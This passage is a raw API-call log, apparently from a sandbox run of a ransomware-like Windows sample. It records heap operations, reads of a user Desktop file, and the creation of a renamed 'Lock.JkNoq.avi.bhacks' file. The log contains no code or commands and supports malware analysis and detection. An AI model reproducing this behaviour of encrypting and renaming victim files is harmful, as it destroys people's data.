RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x2a75588 [0101.677] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0101.677] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop/" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0101.677] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a75588 | out: hHeap=0x2af0000) returned 1 [0101.677] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0101.677] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0101.677] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2abe880 [0101.677] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0101.677] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a08 [0101.677] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/Lock.JkNoq.avi.bhacks" (normalized: "c:\\users\\fd1hvy\\desktop\\lock.jknoq.avi.bhacks"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x44c [0101.677] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7040 [0101.677] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95e0 | out: hHeap=0x2af0000) returned 1 [0101.677] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0101.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0101.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0101.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0101.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0101.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0101.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0101.678] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0101.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72aa8 [0101.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0101.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed40 [0101.679] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0101.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed40 | out: hHeap=0x2af0000) returned 1 [0101.679] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0101.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e680 [0101.680] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0101.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72aa8 [0101.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0101.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0101.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b58 [0101.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0101.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0101.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b58 [0101.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0101.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95e0 [0101.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73118 [0101.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0101.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0101.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0101.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95e0 | out: hHeap=0x2af0000) returned 1 [0101.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0101.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73118 [0101.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7020 [0101.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0101.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95e0 [0101.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73128 [0101.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9688 [0101.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0101.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0101.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95e0 | out: hHeap=0x2af0000) returned 1 [0101.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0101.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7020 | out: hHeap=0x2af0000) returned 1 [0101.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0101.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0101.681] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0101.681] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95e0 [0101.681] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b58 [0101.681] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x100000) returned 0x4ca5020 [0101.683] SetFilePointerEx (in: hFile=0x458, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0101.683] ReadFile (in: hFile=0x458, lpBuffer=0x2aae878, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2aae878*, lpNumberOfBytesRead=0x8cf4f8*=0x9420, lpOverlapped=0x0) returned 1 [0101.685] ReadFile (in: hFile=0x458, lpBuffer=0x2aae878, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2aae878*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0101.685] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95e0 | out: hHeap=0x2af0000) returned 1 [0101.685] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0101.685] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0101.685] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b58 [0101.685] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x9420) returned 0x2a7a130 [0101.686] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x4ca5020 | out: hHeap=0x2af0000) returned 1 [0101.688] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0101.689] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0101.689] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0101.689] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0101.689] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0101.689] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0101.689] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0101.689] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0101.689] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x9420) returned 0x2a83558 [0101.689] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a130 | out: hHeap=0x2af0000) returned 1 [0101.689] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0101.689] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0101.689] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72aa8 [0101.689] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0101.689] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0101.689] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b58 [0101.689] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73118 [0101.689] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x9420) returned 0x2a7a130 [0101.689] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0101.690] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a130 | out: hHeap=0x2af0000) returned 1 [0101.690] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0101.690] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0101.690] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0101.690] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0101.690] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0101.690] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b58 [0101.690] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72aa8 [0101.690] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7220 [0101.690] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7220 | out: hHeap=0x2af0000) returned 1 [0101.690] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0101.690] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0101.690] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0101.690] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0101.690] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72aa8 [0101.690] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0101.690] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b58 [0101.690] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0101.690] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78250 | out: hHeap=0x2af0000) returned 1 [0101.690] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0101.690] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0101.690] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72b58 [0101.690] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0101.691] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0101.691] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73118 [0101.691] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73128 [0101.691] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x9420) returned 0x2a7a130 [0101.691] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0101.691] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a73118 [0101.691] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9850 [0101.691] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a715e8 [0101.691] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0101.691] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a715e8 [0101.691] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0101.691] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a716e8 [0101.691] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0101.691] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a716e8 [0101.691] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0101.691] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71718 [0101.691] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71718 | out: hHeap=0x2af0000) returned 1 [0101.691] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9778 [0101.691] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0101.691] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9688 [0101.691] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71718 [0101.691] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0101.691] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0101.691] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9688 [0101.691] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0101.691] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x9420) returned 0x2a8c980 [0101.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0101.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0101.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71898 [0101.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0101.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0101.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0101.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0101.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ac0 [0101.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71868 [0101.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0101.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0101.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ac0 [0101.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0101.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0101.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a718f8 [0101.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0101.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0101.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0101.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0101.692] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0101.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0101.693] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0101.693] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0101.693] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0101.693] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0101.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0101.693] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0101.693] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0101.693] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0101.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fd0 | out: hHeap=0x2af0000) returned 1 [0101.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0101.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0101.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0101.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0101.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0101.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0101.693] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e6c0 [0101.693] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e6c0 | out: hHeap=0x2af0000) returned 1 [0101.693] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0101.693] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0101.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0101.693] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0101.693] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a30 [0101.693] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0101.693] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0101.693] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0101.693] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0101.693] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0101.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0101.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0101.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0101.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0101.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78458 | out: hHeap=0x2af0000) returned 1 [0101.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0101.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0101.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0101.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0101.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0101.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0101.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0101.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0101.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0101.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0101.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c10 [0101.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b88 [0101.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0101.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0101.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0101.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0101.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78390 | out: hHeap=0x2af0000) returned 1 [0101.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0101.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0101.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0101.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0101.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0101.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0101.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0101.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a00 [0101.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0101.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0101.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a30 [0101.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719d8 [0101.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0101.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0101.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ad8 [0101.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a30 [0101.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78430 | out: hHeap=0x2af0000) returned 1 [0101.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0101.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0101.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0101.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0101.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0101.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, 